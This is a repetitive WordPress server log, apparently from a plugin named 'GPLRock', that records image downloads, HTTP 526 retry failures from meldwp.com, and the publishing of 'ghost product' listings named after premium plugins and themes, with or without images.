GPLRock: Image downloaded successfully for product wpmu-dev-wp-smush-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b406ebe7.jpg [05-Apr-2026 19:11:45 UTC] GPLRock: Using pre-downloaded image for product wpmu-dev-wp-smush-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b406ebe7.jpg [05-Apr-2026 19:11:45 UTC] GPLRock: Ghost product published with image - Product ID: wpmu-dev-wp-smush-pro [05-Apr-2026 19:11:47 UTC] GPLRock: Image downloaded successfully for product unlimited-elements-for-elementor-page-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0a38253c.jpg [05-Apr-2026 19:11:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-biolink--bio-links-page-builder-for-wordpress-4020.webp for product wp-biolink-bio-links-page-builder-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:11:47 UTC] GPLRock: Using pre-downloaded image for product unlimited-elements-for-elementor-page-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0a38253c.jpg [05-Apr-2026 19:11:47 UTC] GPLRock: Ghost product published with image - Product ID: unlimited-elements-for-elementor-page-builder [05-Apr-2026 19:11:47 UTC] GPLRock: Image download failed for product wp-biolink-bio-links-page-builder-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:11:49 UTC] GPLRock: Image downloaded successfully for product amelia-enterprise-level-appointment-booking-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c85c09b2.avif [05-Apr-2026 19:11:49 UTC] GPLRock: Using pre-downloaded image for product amelia-enterprise-level-appointment-booking-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c85c09b2.avif [05-Apr-2026 19:11:49 UTC] GPLRock: Ghost product published with image - Product ID: amelia-enterprise-level-appointment-booking-wordpress-plugin [05-Apr-2026 19:11:49 UTC] GPLRock: Image download failed for product wp-biolink-bio-links-page-builder-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:11:50 UTC] GPLRock: Image downloaded successfully for product wp-mail-smtp-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3e848f4d.jpg [05-Apr-2026 19:11:50 UTC] GPLRock: Using pre-downloaded image for product wp-mail-smtp-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3e848f4d.jpg [05-Apr-2026 19:11:50 UTC] GPLRock: Ghost product published with image - Product ID: wp-mail-smtp-pro [05-Apr-2026 19:11:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-biolink--bio-links-page-builder-for-wordpress-4020.webp for product wp-biolink-bio-links-page-builder-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:11:52 UTC] GPLRock WARNING: Image download failed for product wp-biolink-bio-links-page-builder-for-wordpress. URL: https://meldwp.com/wp-content/uploads/wp-biolink--bio-links-page-builder-for-wordpress-4020.webp [05-Apr-2026 19:11:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wp-biolink-bio-links-page-builder-for-wordpress [05-Apr-2026 19:11:52 UTC] GPLRock: Image downloaded successfully for product educavo-online-courses-education-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-31912fdb.avif [05-Apr-2026 19:11:52 UTC] GPLRock: Using pre-downloaded image for product educavo-online-courses-education-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-31912fdb.avif [05-Apr-2026 19:11:52 UTC] GPLRock: Ghost product published with image - Product ID: educavo-online-courses-education-wordpress-theme [05-Apr-2026 19:11:52 UTC] GPLRock: Image download failed for product ninja-widget-extra-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:11:54 UTC] GPLRock: Image download failed for product ninja-widget-extra-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:11:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ninja-widget-extra-add-on-25241.webp for product ninja-widget-extra-add-on after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:11:56 UTC] GPLRock: Image download failed for product ninja-widget-extra-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:11:58 UTC] GPLRock: Image download failed for product ninja-widget-extra-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:12:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ninja-widget-extra-add-on-25241.webp for product ninja-widget-extra-add-on after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:12:01 UTC] GPLRock WARNING: Image download failed for product ninja-widget-extra-add-on. URL: https://meldwp.com/wp-content/uploads/ninja-widget-extra-add-on-25241.webp [05-Apr-2026 19:12:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ninja-widget-extra-add-on [05-Apr-2026 19:12:01 UTC] GPLRock: Image download failed for product ultimate-gdpr-ccpa-cmp-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:12:03 UTC] GPLRock: Image download failed for product ultimate-gdpr-ccpa-cmp-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:12:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultimate-gdpr--ccpa-cmp-for-wordpress-32017.webp for product ultimate-gdpr-ccpa-cmp-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:12:05 UTC] GPLRock: Image download failed for product ultimate-gdpr-ccpa-cmp-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:12:07 UTC] GPLRock: Image download failed for product ultimate-gdpr-ccpa-cmp-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:12:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultimate-gdpr--ccpa-cmp-for-wordpress-32017.webp for product ultimate-gdpr-ccpa-cmp-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:12:09 UTC] GPLRock WARNING: Image download failed for product ultimate-gdpr-ccpa-cmp-for-wordpress. URL: https://meldwp.com/wp-content/uploads/ultimate-gdpr--ccpa-cmp-for-wordpress-32017.webp [05-Apr-2026 19:12:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ultimate-gdpr-ccpa-cmp-for-wordpress [05-Apr-2026 19:12:09 UTC] GPLRock: Image download failed for product woocommerce-advance-request-a-quote-product-enquiry (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:12:12 UTC] GPLRock: Image download failed for product woocommerce-advance-request-a-quote-product-enquiry (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:12:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-advance-request-a-quote--product-enquiry-27486.webp for product woocommerce-advance-request-a-quote-product-enquiry after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:12:14 UTC] GPLRock: Image download failed for product woocommerce-advance-request-a-quote-product-enquiry (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:12:16 UTC] GPLRock: Image download failed for product woocommerce-advance-request-a-quote-product-enquiry (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:12:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-advance-request-a-quote--product-enquiry-27486.webp for product woocommerce-advance-request-a-quote-product-enquiry after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:12:18 UTC] GPLRock WARNING: Image download failed for product woocommerce-advance-request-a-quote-product-enquiry. URL: https://meldwp.com/wp-content/uploads/woocommerce-advance-request-a-quote--product-enquiry-27486.webp [05-Apr-2026 19:12:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-advance-request-a-quote-product-enquiry [05-Apr-2026 19:12:18 UTC] GPLRock: Image download failed for product fast-portfolio-grid-for-elementor-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:12:20 UTC] GPLRock: Image downloaded successfully for product burgry-burger-fast-food-restaurant-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dee865b0.jpg [05-Apr-2026 19:12:20 UTC] GPLRock: Using pre-downloaded image for product burgry-burger-fast-food-restaurant-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dee865b0.jpg [05-Apr-2026 19:12:20 UTC] GPLRock: Ghost product published with image - Product ID: burgry-burger-fast-food-restaurant-elementor-template-kit [05-Apr-2026 19:12:20 UTC] GPLRock: Image download failed for product fast-portfolio-grid-for-elementor-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:12:22 UTC] GPLRock: Image downloaded successfully for product builderon-construction-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d715f9ce.jpg [05-Apr-2026 19:12:22 UTC] GPLRock: Using pre-downloaded image for product builderon-construction-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d715f9ce.jpg [05-Apr-2026 19:12:22 UTC] GPLRock: Ghost product published with image - Product ID: builderon-construction-elementor-template-kit [05-Apr-2026 19:12:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fast-portfolio--grid-for-elementor-wordpress-plugin-17036.webp for product fast-portfolio-grid-for-elementor-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:12:23 UTC] GPLRock: Image download failed for product fast-portfolio-grid-for-elementor-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:12:23 UTC] GPLRock: Image downloaded successfully for product brilly-jewelry-store-woocommerce-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-34c98d29.jpg [05-Apr-2026 19:12:23 UTC] GPLRock: Using pre-downloaded image for product brilly-jewelry-store-woocommerce-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-34c98d29.jpg [05-Apr-2026 19:12:23 UTC] GPLRock: Ghost product published with image - Product ID: brilly-jewelry-store-woocommerce-elementor-template-kit [05-Apr-2026 19:12:25 UTC] GPLRock: Image downloaded successfully for product blabber-modern-blog-magazine-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8263037f.webp [05-Apr-2026 19:12:25 UTC] GPLRock: Image download failed for product fast-portfolio-grid-for-elementor-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:12:25 UTC] GPLRock: Using pre-downloaded image for product blabber-modern-blog-magazine-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8263037f.webp [05-Apr-2026 19:12:25 UTC] GPLRock: Ghost product published with image - Product ID: blabber-modern-blog-magazine-elementor-template-kit [05-Apr-2026 19:12:26 UTC] GPLRock: Image downloaded successfully for product woocommerce-product-variation-gallery-images (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f375f203.jpg [05-Apr-2026 19:12:26 UTC] GPLRock: Using pre-downloaded image for product woocommerce-product-variation-gallery-images: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f375f203.jpg [05-Apr-2026 19:12:26 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-product-variation-gallery-images [05-Apr-2026 19:12:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fast-portfolio--grid-for-elementor-wordpress-plugin-17036.webp for product fast-portfolio-grid-for-elementor-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:12:27 UTC] GPLRock WARNING: Image download failed for product fast-portfolio-grid-for-elementor-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/fast-portfolio--grid-for-elementor-wordpress-plugin-17036.webp [05-Apr-2026 19:12:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fast-portfolio-grid-for-elementor-wordpress-plugin [05-Apr-2026 19:12:27 UTC] GPLRock: Image download failed for product social-share-for-elementor-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:12:29 UTC] GPLRock: Image downloaded successfully for product product-import-export-plugin-for-woocommerce-webtoffee (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-059111ea.png [05-Apr-2026 19:12:29 UTC] GPLRock: Using pre-downloaded image for product product-import-export-plugin-for-woocommerce-webtoffee: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-059111ea.png [05-Apr-2026 19:12:29 UTC] GPLRock: Ghost product published with image - Product ID: product-import-export-plugin-for-woocommerce-webtoffee [05-Apr-2026 19:12:29 UTC] GPLRock: Image download failed for product social-share-for-elementor-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:12:30 UTC] GPLRock: Image downloaded successfully for product zamzam-umrah-hajj-tour-travel-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e0a21e5c.jpg [05-Apr-2026 19:12:30 UTC] GPLRock: Using pre-downloaded image for product zamzam-umrah-hajj-tour-travel-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e0a21e5c.jpg [05-Apr-2026 19:12:30 UTC] GPLRock: Ghost product published with image - Product ID: zamzam-umrah-hajj-tour-travel-elementor-template-kit [05-Apr-2026 19:12:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/social-share-for-elementor-wordpress-plugin-24193.webp for product social-share-for-elementor-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:12:31 UTC] GPLRock: Image download failed for product social-share-for-elementor-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:12:32 UTC] GPLRock: Image downloaded successfully for product woocommerce-product-builder-custom-pc-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c8b2e0d4.jpg [05-Apr-2026 19:12:32 UTC] GPLRock: Using pre-downloaded image for product woocommerce-product-builder-custom-pc-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c8b2e0d4.jpg [05-Apr-2026 19:12:32 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-product-builder-custom-pc-builder [05-Apr-2026 19:12:33 UTC] GPLRock: Image download failed for product social-share-for-elementor-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:12:34 UTC] GPLRock: Image downloaded successfully for product jogasana-yoga-oriented-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f2de2246.jpg [05-Apr-2026 19:12:34 UTC] GPLRock: Using pre-downloaded image for product jogasana-yoga-oriented-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f2de2246.jpg [05-Apr-2026 19:12:34 UTC] GPLRock: Ghost product published with image - Product ID: jogasana-yoga-oriented-wordpress-theme [05-Apr-2026 19:12:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/social-share-for-elementor-wordpress-plugin-24193.webp for product social-share-for-elementor-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:12:35 UTC] GPLRock WARNING: Image download failed for product social-share-for-elementor-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/social-share-for-elementor-wordpress-plugin-24193.webp [05-Apr-2026 19:12:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: social-share-for-elementor-wordpress-plugin [05-Apr-2026 19:12:35 UTC] GPLRock: Image downloaded successfully for product hostim-web-hosting-wordpress-theme-with-whmcs (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-37d29a58.jpg [05-Apr-2026 19:12:36 UTC] GPLRock: Using pre-downloaded image for product hostim-web-hosting-wordpress-theme-with-whmcs: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-37d29a58.jpg [05-Apr-2026 19:12:36 UTC] GPLRock: Ghost product published with image - Product ID: hostim-web-hosting-wordpress-theme-with-whmcs [05-Apr-2026 19:14:15 UTC] GPLRock: Image download failed for product gyim-gym-and-fitness-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:14:17 UTC] GPLRock: Image download failed for product gyim-gym-and-fitness-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:14:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gyim---gym-and-fitness-wordpress-theme--rtl-9316.webp for product gyim-gym-and-fitness-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:14:19 UTC] GPLRock: Image download failed for product gyim-gym-and-fitness-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:14:21 UTC] GPLRock: Image download failed for product gyim-gym-and-fitness-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:14:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gyim---gym-and-fitness-wordpress-theme--rtl-9316.webp for product gyim-gym-and-fitness-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:14:23 UTC] GPLRock WARNING: Image download failed for product gyim-gym-and-fitness-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/gyim---gym-and-fitness-wordpress-theme--rtl-9316.webp [05-Apr-2026 19:14:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gyim-gym-and-fitness-wordpress-theme-rtl [05-Apr-2026 19:14:24 UTC] GPLRock: Image download failed for product frontline-attorney-lawyer-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:14:26 UTC] GPLRock: Image download failed for product frontline-attorney-lawyer-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:14:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/frontline---attorney--lawyer-wordpress-theme-31551.webp for product frontline-attorney-lawyer-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:14:28 UTC] GPLRock: Image download failed for product frontline-attorney-lawyer-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:14:30 UTC] GPLRock: Image download failed for product frontline-attorney-lawyer-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:14:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/frontline---attorney--lawyer-wordpress-theme-31551.webp for product frontline-attorney-lawyer-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:14:32 UTC] GPLRock WARNING: Image download failed for product frontline-attorney-lawyer-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/frontline---attorney--lawyer-wordpress-theme-31551.webp [05-Apr-2026 19:14:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: frontline-attorney-lawyer-wordpress-theme [05-Apr-2026 19:14:33 UTC] GPLRock: Image download failed for product nursera-home-care-private-nursing-fse-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:14:35 UTC] GPLRock: Image download failed for product nursera-home-care-private-nursing-fse-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:14:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nursera--home-care--private-nursing-fse-wordpress-theme-26828.webp for product nursera-home-care-private-nursing-fse-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:14:37 UTC] GPLRock: Image download failed for product nursera-home-care-private-nursing-fse-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:14:39 UTC] GPLRock: Image download failed for product nursera-home-care-private-nursing-fse-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:14:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nursera--home-care--private-nursing-fse-wordpress-theme-26828.webp for product nursera-home-care-private-nursing-fse-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:14:41 UTC] GPLRock WARNING: Image download failed for product nursera-home-care-private-nursing-fse-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/nursera--home-care--private-nursing-fse-wordpress-theme-26828.webp [05-Apr-2026 19:14:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nursera-home-care-private-nursing-fse-wordpress-theme [05-Apr-2026 19:14:41 UTC] GPLRock: Image download failed for product dc-agency-wordpress-theme-for-creative-agency-hosting-seo-services (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:14:44 UTC] GPLRock: Image download failed for product dc-agency-wordpress-theme-for-creative-agency-hosting-seo-services (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:14:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dc-agency--wordpress-theme-for-creative-agency-hosting-seo-services-30349.webp for product dc-agency-wordpress-theme-for-creative-agency-hosting-seo-services after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:14:46 UTC] GPLRock: Image download failed for product dc-agency-wordpress-theme-for-creative-agency-hosting-seo-services (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:14:48 UTC] GPLRock: Image download failed for product dc-agency-wordpress-theme-for-creative-agency-hosting-seo-services (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:14:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dc-agency--wordpress-theme-for-creative-agency-hosting-seo-services-30349.webp for product dc-agency-wordpress-theme-for-creative-agency-hosting-seo-services after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:14:50 UTC] GPLRock WARNING: Image download failed for product dc-agency-wordpress-theme-for-creative-agency-hosting-seo-services. URL: https://meldwp.com/wp-content/uploads/dc-agency--wordpress-theme-for-creative-agency-hosting-seo-services-30349.webp [05-Apr-2026 19:14:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dc-agency-wordpress-theme-for-creative-agency-hosting-seo-services [05-Apr-2026 19:14:50 UTC] GPLRock: Image download failed for product unta-multipurpose-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:14:52 UTC] GPLRock: Image download failed for product unta-multipurpose-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:14:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/unta---multipurpose-business-wordpress-theme-8310.webp for product unta-multipurpose-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:14:55 UTC] GPLRock: Image download failed for product unta-multipurpose-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:14:57 UTC] GPLRock: Image download failed for product unta-multipurpose-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:14:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/unta---multipurpose-business-wordpress-theme-8310.webp for product unta-multipurpose-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:14:59 UTC] GPLRock WARNING: Image download failed for product unta-multipurpose-business-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/unta---multipurpose-business-wordpress-theme-8310.webp [05-Apr-2026 19:14:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: unta-multipurpose-business-wordpress-theme [05-Apr-2026 19:14:59 UTC] GPLRock: Image download failed for product smartmag-newspaper-magazine-news-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:15:01 UTC] GPLRock: Image download failed for product smartmag-newspaper-magazine-news-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:15:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/smartmag---newspaper-magazine--news-wordpress-16612.webp for product smartmag-newspaper-magazine-news-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:15:04 UTC] GPLRock: Image download failed for product smartmag-newspaper-magazine-news-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:15:06 UTC] GPLRock: Image download failed for product smartmag-newspaper-magazine-news-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:15:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/smartmag---newspaper-magazine--news-wordpress-16612.webp for product smartmag-newspaper-magazine-news-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:15:08 UTC] GPLRock WARNING: Image download failed for product smartmag-newspaper-magazine-news-wordpress. URL: https://meldwp.com/wp-content/uploads/smartmag---newspaper-magazine--news-wordpress-16612.webp [05-Apr-2026 19:15:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: smartmag-newspaper-magazine-news-wordpress [05-Apr-2026 19:15:08 UTC] GPLRock: Image download failed for product jewellery-wp-elementor-woocommerce-responsive-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:15:10 UTC] GPLRock: Image download failed for product jewellery-wp-elementor-woocommerce-responsive-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:15:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jewellery-wp---elementor-woocommerce-responsive-theme-14510.webp for product jewellery-wp-elementor-woocommerce-responsive-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:15:12 UTC] GPLRock: Image download failed for product jewellery-wp-elementor-woocommerce-responsive-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:15:14 UTC] GPLRock: Image download failed for product jewellery-wp-elementor-woocommerce-responsive-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:15:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jewellery-wp---elementor-woocommerce-responsive-theme-14510.webp for product jewellery-wp-elementor-woocommerce-responsive-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:15:16 UTC] GPLRock WARNING: Image download failed for product jewellery-wp-elementor-woocommerce-responsive-theme. URL: https://meldwp.com/wp-content/uploads/jewellery-wp---elementor-woocommerce-responsive-theme-14510.webp [05-Apr-2026 19:15:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: jewellery-wp-elementor-woocommerce-responsive-theme [05-Apr-2026 19:15:17 UTC] GPLRock: Image download failed for product bemeina-plastic-surgery-beauty-clinic-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:15:19 UTC] GPLRock: Image download failed for product bemeina-plastic-surgery-beauty-clinic-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:15:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bemeina---plastic-surgery--beauty-clinic-wordpress-theme-21051.webp for product bemeina-plastic-surgery-beauty-clinic-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:15:24 UTC] GPLRock: Image download failed for product bemeina-plastic-surgery-beauty-clinic-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:15:26 UTC] GPLRock: Image download failed for product bemeina-plastic-surgery-beauty-clinic-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:15:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bemeina---plastic-surgery--beauty-clinic-wordpress-theme-21051.webp for product bemeina-plastic-surgery-beauty-clinic-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:15:28 UTC] GPLRock WARNING: Image download failed for product bemeina-plastic-surgery-beauty-clinic-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bemeina---plastic-surgery--beauty-clinic-wordpress-theme-21051.webp [05-Apr-2026 19:15:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bemeina-plastic-surgery-beauty-clinic-wordpress-theme [05-Apr-2026 19:15:29 UTC] 